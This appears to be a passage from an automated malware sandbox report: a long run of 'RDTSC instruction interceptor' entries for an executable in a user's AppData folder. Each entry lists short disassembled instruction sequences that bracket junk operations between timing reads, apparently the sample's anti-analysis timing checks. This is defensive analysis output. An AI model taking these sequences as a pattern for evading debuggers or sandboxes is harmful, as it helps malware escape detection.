Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD468D second address: CD46B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F0E94F51A59h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD47E4 second address: CD4815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC6h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jng 00007F0E948C9FB8h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81E74 second address: C81E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81E79 second address: C81ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0E948C9FB6h 0x00000009 jg 00007F0E948C9FB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dx, 9ED0h 0x00000019 mov ebx, dword ptr [ebp+12496053h] 0x0000001f mov edx, 497EB8E2h 0x00000024 mov dword ptr [ebp+12470854h], ecx 0x0000002a add eax, ebx 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F0E948C9FB8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, 1A64E797h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD53D5 second address: CD53E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F0E94F51A46h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD53E2 second address: CD5402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD5402 second address: CD5406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD5406 second address: CD5430 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E948C9FB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0E948C9FC8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9B17 second address: CD9B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9B1C second address: CD9B27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F0E948C9FB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9C98 second address: CD9C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E00 second address: CD9E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E04 second address: CD9E0A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD9E0A second address: CD9E52 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E948C9FCCh 0x00000008 pushad 0x00000009 jmp 00007F0E948C9FC5h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jne 00007F0E948C9FB6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a jbe 00007F0E948C9FBCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB3B second address: CDFB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB3F second address: CDFB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0E948C9FBCh 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB51 second address: CDFB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E94F51A46h 0x00000009 jmp 00007F0E94F51A53h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CDFB6F second address: CDFB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jbe 00007F0E948C9FBEh 0x0000000e jnc 00007F0E948C9FB8h 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D51 second address: CE0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D55 second address: CE0D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE0D5B second address: CE0D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B39 second address: CE6B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B3F second address: CE6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B45 second address: CE6B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B4C second address: CE6B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B5F second address: CE6B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE6B63 second address: CE6B6D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AAB second address: CE9AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AB3 second address: CE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E94F51A46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9AC2 second address: CE9AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D63 second address: CE9D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0E94F51A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D6F second address: CE9D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9D7A second address: CE9D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE1 second address: CE9EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE5 second address: CE9EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CE9EE9 second address: CE9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CEA456 second address: CEA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CEA5AF second address: CEA5D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC5h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2548 second address: CF2558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2558 second address: CF2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF285C second address: CF2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0E94F51A51h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2878 second address: CF287E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF287E second address: CF2884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2884 second address: CF2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF29CE second address: CF29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2B5E second address: CF2B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E948C9FB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF2CFF second address: CF2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF1B7A second address: CF1B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F0E948C9FBAh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF7748 second address: CF774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF774C second address: CF776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E948C9FBAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F0E948C9FB6h 0x00000014 jl 00007F0E948C9FB6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF776A second address: CF776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CF776E second address: CF779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F0E948C9FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CFC07C second address: CFC082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D0F031 second address: D0F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEA8 second address: C3FEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F0E94F51A46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEC4 second address: C3FEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FEC8 second address: C3FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3FECE second address: C3FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E948C9FC5h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D1AF72 second address: D1AF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D1AF76 second address: D1AF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CB9 second address: D21CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CC8 second address: D21CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21CCE second address: D21D0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D0A second address: D21D14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D14 second address: D21D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007F0E94F51A46h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21D38 second address: D21D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EB6 second address: D21EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EC1 second address: D21EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EC5 second address: D21EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D21EDC second address: D21EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D222FA second address: D2231F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A58h 0x00000007 ja 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2231F second address: D22327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22327 second address: D2232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2232C second address: D22343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E948C9FB6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007F0E948C9FB6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22677 second address: D2267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2267C second address: D22682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22682 second address: D2268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D22818 second address: D2284F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 jmp 00007F0E948C9FC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F0E948C9FC2h 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2284F second address: D22863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007F0E94F51A46h 0x0000000d jg 00007F0E94F51A46h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26DF3 second address: D26E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007F0E948C9FB6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0E948C9FB6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F34 second address: C44F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F3A second address: C44F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F0E948C9FB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F48 second address: C44F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C44F4C second address: C44F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26962 second address: D26970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0E94F51A48h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26970 second address: D26983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F0E948C9FB6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26983 second address: D26989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26989 second address: D2698E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D2698E second address: D26994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B10 second address: D26B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0E948C9FC4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B2D second address: D26B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
